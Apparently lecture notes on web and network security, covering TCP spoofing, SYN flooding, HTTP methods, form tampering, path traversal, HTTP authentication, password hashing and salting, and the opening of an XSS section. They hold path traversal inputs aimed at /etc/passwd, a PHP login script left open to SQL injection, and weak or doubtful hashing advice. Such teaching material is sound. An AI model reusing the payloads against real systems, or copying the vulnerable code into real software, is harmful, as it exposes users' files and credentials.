Networking Basics

Intro Summary

HTTPS is a protocol intended to provide secure, authenticated communication between the browser and the web server.
The client knows the identity of (the owner of?) the server it is connected to.
A third party cannot eavesdrop on the connection between browser and server, nor modify/inject messages between browser and server.
Meeting these requirements does not necessarily mean that the website is secure.

What are we trying to protect? Is information sent to and/or from the webpage critical, ... ?
What threats are we concerned about? Is there a concern that an attacker might: eavesdrop on messages, modify/inject messages, compromise the server hosting the website, ... ?

An asset is any entity of interest that may be the subject of a threat.
    The information on my website is an asset.
A threat is a potential for violation of security, e.g.
    An attacker masquerades as my website.
    A Denial of Service (DoS) attack on my website.
A vulnerability is a flaw or security weakness in an asset that has the potential to be exploited by a threat.
    TCP/IP and HTTP do not provide authentication.
    The TCP three-way handshake is vulnerable to SYN flooding, which leads to DoS.
A countermeasure is an action or process that mitigates vulnerabilities and prevents and/or reduces threats.
    HTTPS can provide for authentication of websites by the browser.
    SYN-cache, SYN-cookies or firewalls help prevent SYN flooding.

Packets sent across the internet contain 'headers' (simplified): Physical | Network | Transport | Application
    Physical header: data related to the physical link (MAC address, etc.).
    Network header: source and destination IP addresses.
    Transport header: data related to the connection (ports) and used to help manage fault tolerance (out-of-sequence packets, etc.).
    Application: data of the application that is running over the connection.

HTTP is a stateless protocol: at the server side the protocol keeps no record of past/current client interactions.
If state is required then the server (web) application and/or the client application must manage this information.

Three-way handshake to establish a TCP connection:
    Msg 1  Source → Destination : SYN(x)
    Msg 2  Destination → Source : SYN(y), ACK(x + 1)
    Msg 3  Source → Destination : ACK(y + 1)

TCP/IP Spoofing I

In IPv4 there is no authentication of the IP addresses/network data.
The attacker first initiates a legitimate connection and observes the current sequence number used by the server.
    Msgα1  Attacker → Server : SYN(x)
    Msgα2  Server → Attacker : SYN(y), ACK(x + 1)
    Msgα3  Attacker → Server : ACK(y + 1)
The attacker immediately initiates another connection with the server, masquerading as a non-existent/spoofed IP address A.
    Msgβ1  A[Attacker] → Server : SYN(x′)
    Msgβ2  Server → A : SYN(y′), ACK(x′ + 1)
    Msgβ3  A[Attacker] → Server : ACK(y′ + 1)
The server's SYN/ACK (and y′) may be lost (not delivered to the attacker), but the attacker can predict the value of y′ based on their previous connection and so establish the connection.

TCP/IP Spoofing II

If connected, the legitimate owner of the spoofed address may respond by terminating a connection it did not initiate:
    Msgβ1  A[Attacker] → Server : SYN(x)
    Msgβ2  Server → A : SYN(y), ACK(x + 1)
    Msgβ3  A[Attacker] → Server : ACK(y + 1)
    Msgβ3  A → Server : RST
The attacker must either use a non-existent IP address or ensure that the legitimate owner cannot respond. The latter is done by either breaking/blocking A's connection or SYN-flooding A.
TCP/IP does not provide (strong) authentication of hosts.

SYN-Flooding

There is a limit on the number of concurrent 'half-open' TCP connections per port. When the limit is reached, TCP discards all new incoming connection requests.
The limit varies. Half-open connections time out (after around 75 seconds).
The attack:
The attacker floods the destination server with opening messages (SYNs), filling the available connection slots and denying valid connections.
The attacker makes sure that SYNs are sent faster than half-open connections expire.
The source IP addresses are non-existent/randomly generated.
The source of the attack is not apparent since the IP address is spoofed.
Distributed Denial of Service (DDoS): the attacker uses a large number of compromised systems (zombies) to carry out a distributed version of the above.

Avoiding SYN Flooding Attacks

Reduce the timeout period to a short time, e.g. 10 seconds, to make it harder to maintain the attack window; this may deny legitimate access.
Increase the number of half-open connections allowed; this increases resource requirements.
Disable non-essential services in order to reduce the number of ports that can be attacked.
Synkill is an active monitor that inspects packet source IP addresses against good/bad lists of IP addresses. Behaviour during the three-way handshake influences list membership.
Use a firewall (in between the public network and the server) to throttle the number of packets permitted.
Use SYN-cache, SYN-cookies.

TCP/IP Vulnerabilities: some other attacks

Sniping: the attacker gets sequence numbers from packets and sends an RST packet to close the connection.
Hijacking: the attacker snipes one end of a connection and takes over talking to the other side.
Packet Sniffing: read the contents of a packet (e.g. user id/password).
Echo Service (Port 7): send a packet to the target IP spoofed from the same IP; the host may spend all its resources in a loop echoing itself (fixed in most implementations).
DNS Spoofing: typically weak authentication between name servers; convince the local name server that a domain name points to some IP address.
Probing: attempt a connection to the target host/port; an RST reply means the port is closed, probably. The target may log the probe.
    As above, but the attacker does not reply to the SYN/ACK; less likely that the target will log the probe.
    FIN scanning: send a FIN packet; if the port is closed then the target sends an RST. If open then the target drops the FIN. Less likely to be logged.

HTTP Basics

Paros is used to trap/examine/etc. HTTP traffic to/from my browser. Paros operates as an HTTP proxy used by the browser, i.e.
all HTTP traffic between the web server and the browser goes through the Paros proxy.

HTTP Request

The first line of every HTTP request has three items, separated by spaces:
    A verb indicating the HTTP method (GET is the most common).
    The requested URL, with an optional query string containing parameters, introduced by '?'.
    The HTTP version being used (typically 1.0/1.1).
Other information in the request:
    The Referer header indicates the URL from which the request originated.
    The User-Agent header provides information about the browser, etc.
    The Host header specifies the hostname that appeared in the full URL (necessary for virtually hosted websites).
    The Cookie header carries some 'state' that was stored by the server on the client during a previous visit.

Not much privacy in the HTTP Request

An HTTP request gives away information about your host, operating system and browser configuration.
The Firefox plugin BrowserMasquerade can be used to block/modify some of the information sent in an HTTP request.
The Referer header contains the URL of the web page from which the request originated. Some websites use this to make sure that a request originated from one of their own pages, for example to make sure that visitors go through the 'front door' web page of their website.
However, since the Referer header is generated by the browser, the user can easily change it (e.g. using BrowserMasquerade) to appear as if the user came via the front door.

HTTP Response

The first line of every HTTP response consists of three items, separated by spaces:
    The HTTP version used.
    A numeric status code indicating the result of the request. 200 (most common) means the request was successful and the requested resource will follow.
    A textual reason phrase further describing the response status.
Other headers include:
    Information about the Server software.
    A cookie to be set in the browser (if Set-Cookie is present).
    The Pragma header, if present, instructs the browser not to store the response in its cache.
    The Connection header in this case indicates that the connection will be closed after completion of the response (non-persistent).

Server Information Disclosure

An HTTP response may disclose information about the underlying system, web server, etc.
Disclosed web-server information may be useful to an attacker. For example, Apache/1.3.37 (unix) is an old version of Apache and is vulnerable to a buffer-overflow attack, which means that a 'visitor' to the website can get the Apache application to execute an arbitrary piece of code on its server and thus gain control of the server. Knowing the version of the software makes this easier for the attacker.
Configure the web server so that it reveals as little information as possible about the server configuration. For Apache, the configuration file httpd.conf has ServerTokens set to Full by default.

HTTP Response

Remember that web pages are hypertext and the material that you see on the page may be composed of hypertext originating from a number of different sources/hosts.
Consider the HTML (deprecated)
    <meta http-equiv="Refresh" content="0; url='http://www.ucc.ie/en/'">
The response above causes a redirect: the browser issues a further GET www.ucc.ie/en to the server, and the response can result in GETs to further URLs, and so forth.
Note that using a refresh meta-tag for URL redirection is discouraged by the W3C: "[...] Developers cannot predict how much time a user will require to read a page; premature refresh can disorient users. Content developers should avoid periodic refresh and allow users to choose when they want the latest information. [...]"
One should use a manual redirect, a 3xx redirect response or JavaScript instead.

Safe Requests

GET HTTP Method

The GET method can be used to send parameters to the requested resource in the URL string. For example, a search for "php security" on amazon.co.uk:
    GET http://www.amazon.co.uk/s/?field-keywords=%22php%20security%22 HTTP/1.
    Host: www.amazon.co.uk

An advantage of using GET parameters is that the document can be bookmarked. However, they are also stored in logs and in the browser history, and are included in the Referer header when following a link. Also, early browsers did not encrypt the URL when running HTTPS.
GET parameters should not be used to transmit sensitive data.

A website foobar.com uses the following form for its user login webpage.
    <form method="GET" action="/foobar.com/login.php">
    <p> Username <input type="text" name="username"></p>
    <p> Password <input type="text" name="password"></p>
    <p><input type="submit"></p>
    </form>
If I enter my name and password then I arrive at the URL
    foobar.com/login.php?username=simon&password=mypass
This URL can be bookmarked/stored in the browser history and could be accessed by anyone who has access to my browser.
It is not necessary to use this HTML form to log in.
Suppose that upon authentication the HTML response included a link to another webpage/site. In that case, the name and password will be included in the Referer header when the user clicks on that link.

POST HTTP Request

The POST method is designed for performing actions. Request parameters can be sent in the body of the message.
For example, the user homer logs into the Department's moodle website with his password simpson.
    Username=homer&password=simpson
Upon authenticating, he arrives at http://csa6.ucc.ie/moodle/: in this case his username and password are not included in the URL and it can be safely bookmarked, stored in history, etc.
Note: the username and password are still visible to anyone eavesdropping on the HTTP connection.

Hidden Elements in Forms

Hidden elements are used to transmit data via the client in a superficially unmodifiable way.
For example, suppose that during authentication a user is identified as either a student or regular customer by the foobar.com website and this information is encoded using hidden elements in subsequent webpages visited by the customer.
Student customers get a 20% discount when they use the order.php application.
Suppose that Alice, a regular/non-student customer, authenticates and is presented with the following form.
    <form method="GET" action="foobar.com/order.php">
    <p> ItemID <input type="text" name="itemID"></p>
    <p> Quantity <input type="text" name="quantity"></p>
    <input type="hidden" name="kind" value="regular">
    <p><input type="submit"></p>
    </form>
Using this form Alice can 'see' only the fields ItemID and Quantity and the submit button, and should not get the 20% discount.
However, Alice can see the parameters in the URL and can bypass the form and the intended controls by entering the URL directly:
    http://foobar.com/order.php?itemID="1234"&quantity="8"&kind="student"
Changing the request method to POST does not avoid this problem since Alice can still bypass the form/controls by generating the POST request directly/outside of the browser.

Uploading To Safe Locations

Uploaded files may contain malicious programs or data and one needs to be sure that they cannot end up in a directory where they could be misinterpreted.
Allowing an uploaded file to end up in a sub-directory of the document root (e.g. /Applications/MAMP/htdocs) that happens to be executable means that it may be possible for a malicious user to upload a PHP program to the server, which they then execute by visiting the URL.

Path Traversal Attack

The intention is that files with user-proposed names such as myfile are safely quarantined in a directory, as /Applications/MAMP/private/myfile, that is well away from system files and is not under the document root.
However, the PHP server code does not carry out any check on the validity of the filename proposed by the user.
Suppose that a malicious user proposed
    fileName="../htdocs/order.php"
Then the value of $new_filename is
    /Applications/MAMP/private/../htdocs/order.php = /Applications/MAMP/htdocs/order.php
If order.php already exists in the document root then the malicious user has managed to overwrite it with his own file!
We can use "dot-dot-slash" path traversals to reach any target file. Suppose instead that the user proposed
    fileName=../../../etc/passwd
This is the path (on my server) for /etc/passwd, where user passwords may be stored.
On a Windows system an attacker can navigate only within the partition that holds the web root. On Linux the attacker may be able to navigate the whole disk.

Filtering Path Information in a Filename

One could check for "../", etc., in user-supplied data, but don't forget that traversals can also be expressed in a string as %2e%2e%2f.
A determined attacker can choose a different text encoding, for example %u002e (16-bit Unicode encoding of "."), etc. These should also be checked, as should the directory separator '\' used by Windows.
A safer approach is to use the function basename() to return just the filename without path information:
    $new_filename = null;  // stays null if the check below fails
    if (basename($_POST['filename']) == $_POST['filename']) {
        $new_filename = '/Applications/MAMP/private/'.$_POST['filename'];
        ...
One could alternatively use realpath(), which reduces the path to its simplest form, and then check that the resulting path is acceptable to the server.

Path Traversal in General

Path traversal attacks are not limited to the file upload scenario. They may occur any time data from a client forms part of a filename/path at the server side.
For example, an application uses a dynamic page to return static images to the client with the name of the image specified in a query string parameter.
    http://foobar.com/productImage.php?file=widget.jpg
The attacker uses a path traversal sequence to attempt to access another file:
    http://foobar.com/productImage.php?file=../../../etc/passwd
This attack can be avoided if the server filters the filename provided.

Past Path Traversal Attacks

On some older web servers it was possible to carry out a path traversal attack on the URL itself and to break out of the document root.
A web server should block an attempt to visit the URL
    http://foobar.com/../../../etc/passwd
and keep the visitor within the document root.
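
The basename-style check and the resolve-then-verify check discussed for path traversal can be sketched as follows. This is only an illustration in JavaScript (Node.js) rather than the PHP used by the notes; UPLOAD_DIR and safeUploadPath are hypothetical names, and the directory is simply the example quarantine path from the notes. It assumes the file name has already been URL-decoded by the server framework.

```javascript
const path = require('node:path');

// Hypothetical quarantine directory (the example path used in the notes).
const UPLOAD_DIR = '/Applications/MAMP/private';

// Returns the full storage path for a user-proposed file name,
// or null if the name carries any path information.
function safeUploadPath(fileName) {
  // Accept only a bare file name: no directory part, no '.' or '..',
  // and no Windows-style separator.
  if (fileName === '' || fileName === '.' || fileName === '..' ||
      fileName.includes('\\') ||
      path.posix.basename(fileName) !== fileName) {
    return null;
  }
  // Second check: after reducing the path to its simplest form,
  // it must still lie inside the quarantine directory.
  const resolved = path.posix.resolve(UPLOAD_DIR, fileName);
  return resolved.startsWith(UPLOAD_DIR + '/') ? resolved : null;
}

// What the unchecked concatenation from the notes would produce:
console.log(path.posix.normalize(UPLOAD_DIR + '/' + '../htdocs/order.php'));
// The checked version:
console.log(safeUploadPath('myfile'));
console.log(safeUploadPath('../htdocs/order.php'));
console.log(safeUploadPath('../../../etc/passwd'));
```

The two checks overlap on purpose: the first rejects names with path components outright, and the second guards against anything the first might miss.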

Client Side Conclusions

As the visitor to a website you should be aware of and be comfortable with the data that is being sent to the website.
An HTTP request can send quite a bit of detail about your system. This may violate your privacy and/or reveal information about security vulnerabilities of your system.
Sensitive data in a URL may persist in the browser history, logs, subsequent requests (Referer), etc.
You may not want to trust the website owner with your data (sensitive or otherwise).
You can use tools such as BrowserMasquerade to mask part of the information transmitted in the request. However, it is up to your own judgement to decide whether it is safe to visit a particular website.
Keep your browser, server, etc. software up to date and reveal as little information as possible.

As a website owner/designer you should not rely on client controls at the browser side to enforce the security of your application.
Don't assume that every request from a client comes via your forms.
Don't make decisions using hidden data in forms.
Don't make decisions using disabled data in forms.
Don't necessarily believe the headers from the client.
When accepting uploaded files remember that they may contain malicious code/data and be careful where and how they are accessed and stored.
The server applications must filter and check all input data!

Authentication

User Authentication

A security policy is typically defined in terms of the users of the system. An authentication mechanism is needed to counter one user masquerading as another.
An authentication mechanism requires a user to prove that they are who they claim to be. This proof can come from: what the user knows, e.g.
passwords, PINs; what the user has, e.g. a key, a badge; what the user is, e.g. fingerprint, retinal characteristics; where the user is, e.g. at a particular terminal.

Some Authentication Threats

Password guessing: shoulder surfing, eavesdropping on network traffic.
Inconvenience: hard to remember, have to carry authentication tokens, using the same password for different accounts.
Denial of Service: attacker behaviour (attempting to masquerade as the target) results in the account being locked out.
Social Engineering: phishing.
Physical keystroke loggers, login-spoof, Trojan Horse programs, pharming (redirecting website traffic to a bogus website).

HTTP Request with Basic Authentication Information

If the user attempts to visit a URL that requires authentication (without providing a username/password) then the response is:
    HTTP/1.1 401 Authorization Required
    Date: Fri, 08 Oct 2010 08:02:04 GMT
    Server: Apache
    WWW-Authenticate: Basic realm="EnterPassword"
    Content-Length: 460
    Content-Type: text/html; charset=iso-8859-1
This instructs the browser to request a username/password. The username and password are passed in a header in the HTTP request:
    GET http://localhost/ HTTP/1.1
    Host: localhost
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 115
    Proxy-Connection: keep-alive
    Authorization: Basic aG9tZXI6c2ltcHNvbg==
    User-Agent: Paros/3.2.13

This is not Particularly Secure

The Authorization header provides the username and password encoded using Base64. For example, the string homer is converted to aG9tZXI= in Base64.
In the example above, the Base64 encoding of the username and password is sent from the browser to the server as plaintext over the HTTP protocol.
This means that a malicious user who can eavesdrop on this connection can discover the encoded username and password, simply decode the Base64 and then masquerade as the user.
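
How little effort the decoding takes can be seen in a few lines. The sketch below is JavaScript for Node.js; decodeBasicAuth is a hypothetical helper name, and the header value is the one from the captured request above.

```javascript
// Decode the credentials carried by an HTTP Basic Authorization header value.
// decodeBasicAuth is a hypothetical helper used only for this illustration.
function decodeBasicAuth(headerValue) {
  const [scheme, encoded] = headerValue.split(' ');
  if (scheme !== 'Basic' || !encoded) {
    throw new Error('not a Basic Authorization header');
  }
  // Base64 is an encoding, not encryption: no key is needed to reverse it.
  const decoded = Buffer.from(encoded, 'base64').toString('utf8');
  const separator = decoded.indexOf(':'); // first ':' splits username from password
  if (separator < 0) {
    throw new Error('malformed credentials');
  }
  return {
    username: decoded.slice(0, separator),
    password: decoded.slice(separator + 1),
  };
}

console.log(decodeBasicAuth('Basic aG9tZXI6c2ltcHNvbg=='));
// prints { username: 'homer', password: 'simpson' }
```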
This basic HTTP authentication is adequate as a weak form of authentication. However, if stronger authentication is required then the connection to the server should at least be made over a secure channel using HTTPS (which we will look at later).

Configuring the Web Server for HTTP Authentication

The web-server file .htaccess is used to specify who may access documents under the directory that contains it.
For example, placing the following .htaccess in my directory /Applications/MAMP/htdocs/lab01 means that only the authenticated user homer may access documents in this directory.
    AuthUserFile /Applications/MAMP/private/.htpasswd
    AuthGroupFile /dev/null
    AuthName EnterPassword
    AuthType Basic
    require user homer
The .htpasswd file specifies the user's password.
    homer:j7IaPh9DCn/Wg
The password is given in an 'encrypted' form (one-way hash) so that anyone who manages to read the .htpasswd file cannot determine homer's password. However, just to be safe (defense in depth) we should not store the .htpasswd file in the web document path.
Aside. In *nix, you can use the shell command htpasswd to 'encrypt' a password. For example, htpasswd -nb homer doh! generates the entry homer:jMbnDzxStXI9E.

Other Types of HTTP Authentication

HTTP also supports challenge-response based authentication. The browser proves to the server that it knows the password without having to reveal it.
    Msg1 : Browser → Server : hello
    Msg2 : Server → Browser : challenge N
    Msg3 : Browser → Server : response h(N : username : password)
where h() is a special form of encryption (a one-way hash function).
So long as the server generates a different challenge for every authentication attempt, an eavesdropper listening in on the exchange cannot discover the password (this requires breaking the encryption), nor can it carry out a replay attack, since every authentication exchange is different.
HTTP provides NTLM and Digest as challenge-response protocols.
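
The three-message exchange can be sketched as below. This is an illustration only, in JavaScript (Node.js): SHA-256 stands in for the hash h(), and the function names newChallenge, response and verify are hypothetical, not part of any HTTP library.

```javascript
const crypto = require('node:crypto');

// Msg2: the server issues a fresh random challenge N for every attempt.
function newChallenge() {
  return crypto.randomBytes(16).toString('hex');
}

// Msg3: h(N : username : password), with SHA-256 standing in for h().
function response(nonce, username, password) {
  return crypto.createHash('sha256')
    .update(`${nonce}:${username}:${password}`)
    .digest('hex');
}

// The server recomputes the expected response from its own copy of the
// password and compares the two values in constant time.
function verify(nonce, username, storedPassword, received) {
  const expected = Buffer.from(response(nonce, username, storedPassword), 'hex');
  const actual = Buffer.from(received, 'hex');
  return expected.length === actual.length &&
    crypto.timingSafeEqual(expected, actual);
}

const challenge = newChallenge();
const answer = response(challenge, 'homer', 'simpson');         // computed by the browser
console.log(verify(challenge, 'homer', 'simpson', answer));      // genuine attempt
console.log(verify(newChallenge(), 'homer', 'simpson', answer)); // replayed answer, new challenge
```

The replayed answer fails because it was computed for a different challenge. Digest and NTLM differ in the details of what is hashed, but follow this outline.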
However, due to a number of factors, these protocols are not much more effective than Basic.
In practice, complex web applications implement their own authentication mechanisms.

Authenticating with Digest

A user attempts to visit a website which is configured to use challenge-response authentication. The response is:
    HTTP/1.1 401 Authorization Required
    Date: Fri, 08 Oct 2010 09:14:18 GMT
    Server: Apache
    WWW-Authenticate: Digest realm="EnterPassword",
        nonce="gXpwbxeSBAA=4d0a4e5c20fa710a5cd920170b521f5141503755",
        algorithm=MD5, qop="auth"
    Content-Length: 460
    Content-Type: text/html; charset=iso-8859-1
The browser obtains the user-id and password from the user and sends the following request.
    GET http://localhost/ HTTP/1.1
    Host: localhost
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 115
    Proxy-Connection: keep-alive
    Authorization: Digest username="homer", realm="EnterPassword",
        nonce="gXpwbxeSBAA=4d0a4e5c20fa710a5cd920170b521f5141503755",
        uri="/", algorithm=MD5, response="43cf12bd3f8ae897174783e9d6e9dfea",
        qop=auth, nc=00000001, cnonce="6730aae57c007a05"
    User-Agent: Paros/3.2.13

Group Based Access Control Policies

You can organize the users who may access the website/page into groups and then allow access based on these groups.
    AuthUserFile /Applications/MAMP/private/.htpasswd
    AuthGroupFile /Applications/MAMP/private/.htgroup
    AuthName EnterPassword
    AuthType Basic
    require group cs3511
The .htgroup file defines the groups.
    cs3511: homer monty bart
This assumes that the passwords for these users are in the .htpasswd file.

Blocking Access Based on IP

You can block access to your website/page by specifying access controls by IP address. For example, block access from 123.45.6.7 and from the system csa.cit.ie.
    order allow,deny
    deny from 123.45.6.7
    deny from csa.cit.ie
    allow from all
Using an IP address is a weak form of access control since it is possible for the visiting system to spoof its IP address.

A Simple Web Login Mechanism

Suppose that only registered users are permitted access to the foobar.com website.
In order to log in (be authenticated) a user must provide a user name and password to the login form at foobar.com/login.html
The following is a (poor) example of how this authentication might be implemented at the server.
    A database table contains the names of authorized users and their corresponding passwords.
    The login script checks whether the provided username/password appear in the table.
    A session to the main website page is created for an authenticated user.

The Database Table

    CREATE TABLE passwordTable (
      `username` varchar(8) NOT NULL,
      `password` varchar(8) NOT NULL,
      PRIMARY KEY (`username`)
    );
Note that specifying username as the primary key ensures that it is not possible to have two users with the same name.

The Login Form

    <form action="http://foobar.com/login.php" method="POST">
    <p> Username: <input type="text" name="myusername" /></p>
    <p> Password: <input type="password" name="mypassword" /></p>
    <p> <input type="submit" /></p>
    </form>
Note that input type="password" hinders a shoulder-surfing attack by displaying each typed password character as •.
The request is sent via HTTP, so the userid and password are sent as plaintext and could be discovered by an attacker eavesdropping on the connection.

The Login Script: Connecting To The Database

    <?php
    $host="localhost";          // Host name
    $user="...";                // Mysql username
    $password="...";            // Mysql password
    $dbname="CS3511";           // Database name
    $tbl_name="passwordTable";  // Table name
    $dbconnection = mysql_connect( $host, $user, $password );
    if ( ! $dbconnection ) { output_problem_page(); die(); }
    // Try to select database
    $dbselection = mysql_select_db( $dbname );
    if ( !
        $dbselection ) { output_problem_page(); die(); }
    ?>

The Login Script: Continued, Check Username / Password

    // DANGER: these **should** be filtered, among other things...
    $myusername=$_POST['myusername'];
    $mypassword=$_POST['mypassword'];
    $sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
    $result=mysql_query($sql);
    $count=mysql_num_rows($result);
    if($count==1){
        session_start();
        header("location:main_page.php");
    } else {
        echo "Wrong Username or Password";
    }
(We'll look at how to correctly filter the input and set up the session later.)

Attacking the Login Script

Password Guessing. A malicious user could try 'likely' passwords for a given user. This assumes that the attacker knows a valid username. On failure, the script should not reveal whether or not the username is valid.
Dictionary Attack. A malicious user could write an attacking script that tries all possible words from a dictionary as the password for a given user. Passwords should not be words from a dictionary.
Brute Force Attack. A malicious user could write an attacking script that tries all possible 8-character strings as passwords. This is a large number of tests that may be impractical over a network; however, the malicious user could reduce the search space by trying, for example, just lowercase letters. Users should be required to pick long passwords that are a mix of upper/lower case letters, digits, etc.
A simple throttling mechanism could be added to the code whereby a login attempt fails if it is made within 15 seconds (for example) of a previous failure.

Protecting Stored Passwords

The web server stores the username/password pairs in the database table passwordTable. This means that anyone (e.g. an administrator) who has access to the database can look up a user's password. This is not considered good practice.
The administrator of the web site may be able to deduce the (same?) passwords you use on other web sites over which the administrator has no authority.
If the web site is compromised then an attacker will be able to discover user passwords.
Remember the principle of least privilege.
We would like some way to avoid storing the password while at the same time being able to test whether a user-supplied password is valid. We will use a cryptographic one-way hash function.

One Way Hash Function

A function h maps an arbitrary-length value x to a fixed-length value y such that:
    Hard to reverse. Given a value y it is not feasible to find x with y = h(x).
    Collision freeness. It is hard to find values x, x′ such that h(x) = h(x′).
    Unpredictability. The hash value h(x) does not give any information about any part of its operand x.

Protecting the Password Database Using One-Way Hash Function

Rather than store a user password as cleartext in the database table we store the one-way hash of the password.
An attacker who obtains a copy of the database table will not be able to determine the password, as doing so would mean reversing a one-way hash function.
When checking a submitted password, the login.php script simply hashes the password provided and checks that against the database.
    ...
    $myusername=$_POST['myusername'];
    $mypassword=sha1($_POST['mypassword']);
    $sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
    $result=mysql_query($sql);
    ...

Finding Passwords from Hash Functions

If the attacker has managed to obtain a copy of the (hashed) password database then how might s/he figure out a user's password?
Recall the property: Collision freeness. It is hard to find values x, x′ such that h(x) = h(x′). (We'll see later that this is very important for digital signatures.)
If I have a specific x and h(x) and I'm searching for another y such that h(y) = h(x) then the effort required will be about $2^{n}$ for an n-bit hash value.
However, if I don't care which values x and y are found with the relationship h(x) = h(y), then there is a good chance of finding some pair within about $2^{n/2}$ attempts, due to the Birthday Paradox.
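
The birthday effect can be observed directly on a deliberately shortened hash. The sketch below, in JavaScript (Node.js), truncates SHA-256 to 24 bits (an assumption made purely so that the search finishes quickly) and hashes distinct messages until two of them collide; truncatedHash and findCollision are hypothetical helper names.

```javascript
const crypto = require('node:crypto');

// First `bits` bits of SHA-256(message) as a hex string
// (bits is assumed to be a multiple of 4).
function truncatedHash(message, bits) {
  return crypto.createHash('sha256').update(message).digest('hex').slice(0, bits / 4);
}

// Hash distinct messages until any two of them share a truncated digest.
function findCollision(bits) {
  const seen = new Map(); // truncated digest -> message that produced it
  for (let i = 0; ; i++) {
    const message = `message-${i}`;
    const digest = truncatedHash(message, bits);
    if (seen.has(digest)) {
      return { first: seen.get(digest), second: message, digest, attempts: i + 1 };
    }
    seen.set(digest, message);
  }
}

const result = findCollision(24);
console.log(result);
console.log('birthday estimate 2^(n/2):', 2 ** (24 / 2), 'full space 2^n:', 2 ** 24);
```

The number of attempts reported is typically within a small factor of 2^(n/2) = 4096, far below the 2^24 needed to match one specific, pre-chosen digest.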
For example, we have a good chance of finding a pair of messages m and m′ such that md5(m) = md5(m′) with just $2^{64}$ tests, making it vulnerable to brute-force attack.
However, MD5 suffers a serious design flaw which means a collision can be found within $2^{8}$ operations, and recently collisions were found in SHA1 in $2^{63}$ operations.
Currently, SHA256 and SHA512 are considered safe.

Pre-computation Dictionary Attack on the (Hashed) Password Table

The attacker builds a table of dictionary words and corresponding hash values.
    password    hash(password)
    aardvark    $1$ac23b37db0039dda62896bb21f312755
    boy         $1$653805544e622bacc4cc028613a1358a
    ...         ...
The attacker merges (joins) this table against passwordTable in the hope of matching a poorly chosen password.
The cost of storing and building a dictionary table is small and the attacker can use multiple dictionaries: dictionaries for different languages, Klingon, lines from songs, etc.
The attacker can also find users with the same password.
This dictionary attack is an example of a pre-computation attack: most of the effort goes into building the dictionary, while the search/merge is relatively cheap and the dictionary can be re-used.

Using Salt to Defend Against Dictionary Attacks

Strategy: make it impractical to build a dictionary table.
When a password is chosen by the user, a random salt value is generated and hashed with the password.
The password table stores the username, the chosen salt and a hash of the salt and password.
If the salt is large then building the dictionary table becomes costly.
    word        salt    h(salt^word)
    aardvark    0       $1$29b43ef4c7e4b84ff9f25ea158f46818
    aardvark    1       $1$263818db1dc48169633a51e04fa0bf98
    ..          ..      ..
    boy         0       $1$fc0f90e9b32b460b569c6d27291bc3ba
    boy         1       $1$ef90e3e32b460b569c6d2723234aeba
    ..          ..      ..

Authenticating with HTTP

For HTTP authentication the web server stores a list of userid/passwords. The hash of the password is stored so that an attacker cannot discover a user's password from the .htpasswd file.
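
Whatever the storage (a database table or a password file), the salting strategy comes down to the two operations sketched below. This is an illustration in JavaScript (Node.js), not the scheme used by any particular tool: SHA-256 is assumed as the hash, the salt length of 16 bytes is an arbitrary choice, and makeRecord, checkPassword and hashWithSalt are hypothetical names.

```javascript
const crypto = require('node:crypto');

// h(salt ^ password): hash of the salt followed by the password.
function hashWithSalt(salt, password) {
  return crypto.createHash('sha256').update(salt).update(password).digest('hex');
}

// When the user chooses a password: build the record to be stored.
function makeRecord(username, password) {
  const salt = crypto.randomBytes(16).toString('hex'); // fresh random salt per user
  return { username, salt, hash: hashWithSalt(salt, password) };
}

// At login: recompute the hash with the stored salt and compare.
function checkPassword(record, candidate) {
  const expected = Buffer.from(record.hash, 'hex');
  const actual = Buffer.from(hashWithSalt(record.salt, candidate), 'hex');
  return crypto.timingSafeEqual(expected, actual); // both are 32 bytes
}

const homer = makeRecord('homer', 'simpson');
const bart = makeRecord('bart', 'simpson');   // same password, different salt
console.log(checkPassword(homer, 'simpson')); // correct password
console.log(checkPassword(homer, 'doh!'));    // wrong password
console.log(homer.hash === bart.hash);        // identical passwords no longer match
```

Because each record has its own salt, a pre-computed dictionary would need one entry per word per possible salt, and users who share a password are no longer visible as such in the table.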
The htpasswd tool can be used to generate the correct userid/salt/hashed password entry for Basic HTTP authentication. This generates a random salt value and the htpasswd entry for the given userid and password:

    userid : salt.md5(salt.password)

When a user authenticates under HTTP Basic authentication, the web-server retrieves the user's entry in the password file, obtains the salt, re-computes md5(salt.password) from the password passed by the browser and compares the result with the stored hash. If Digest HTTP authentication is used then the user/password must be stored differently, since the web-server needs to 'know' the user's password in order to check the validity of the user's response. The htdigest tool can be used to generate the entry for the password file in this case.

One Way Hash Function in PHP

One-way hash functions are also called Message Digests. PHP provides functions that implement md5 (V.4 onwards) and sha1 (V.4.3 onwards). When a user first picks a password, a random salt should be generated and the hash of the salt and password stored in the password database.

    ...
    $mypassword=$_POST['mypassword'];
    // $strong is set to TRUE if a cryptographically strong generator was used
    $salt= openssl_random_pseudo_bytes(2, $strong);
    $hpasswd= sha1($salt.$mypassword);
    // store the userid, $hpasswd *and* the salt

This uses a random salt string of length 2 bytes; the second argument is passed by reference and reports whether the bytes came from a cryptographically strong generator. When the user logs in, the login script looks up the user's salt, recomputes the hashed salted password and compares the result against the stored value $hpasswd.

Cross Site Scripting

Introduction

Cross site scripting (XSS) is one of the best known types of web attack. XSS results in the insertion of malicious (JavaScript) code into a web-page that the user trusts. The user unknowingly accesses the page and executes the script, which could cause credentials and cookies to be stolen, key logging, Denial of Service . . .
XSS is the most prevalent web vulnerability, appearing in around 70% of all websites and accounting for around 20% of Common Vulnerabilities and Exposures (CVE) entries.

JavaScript Security

A JavaScript program downloaded in the browser from a web-page executes in a Java-like 'sand-box' that limits the local system resources that it may access. JavaScript's same-origin security policy prevents scripts loaded from one origin (Web site) from getting or setting properties of a document loaded from a different origin. This policy prevents hostile code from one origin from taking over or manipulating documents from another. More precisely, an origin is identified by domain, port and application protocol. Without this policy, JavaScript from a hostile site could do any number of undesirable things, such as snoop keypresses while you're logging in to a site in a different window, wait for you to go to your online banking site and insert spurious transactions, steal login cookies from other domains, etc.

Suppose that when Bob visits the website www.evil.com, the response includes the JavaScript

    <p><script>alert('Code from Alice');</script></p>

Bob's browser executes the script as it obeys the same-origin policy.

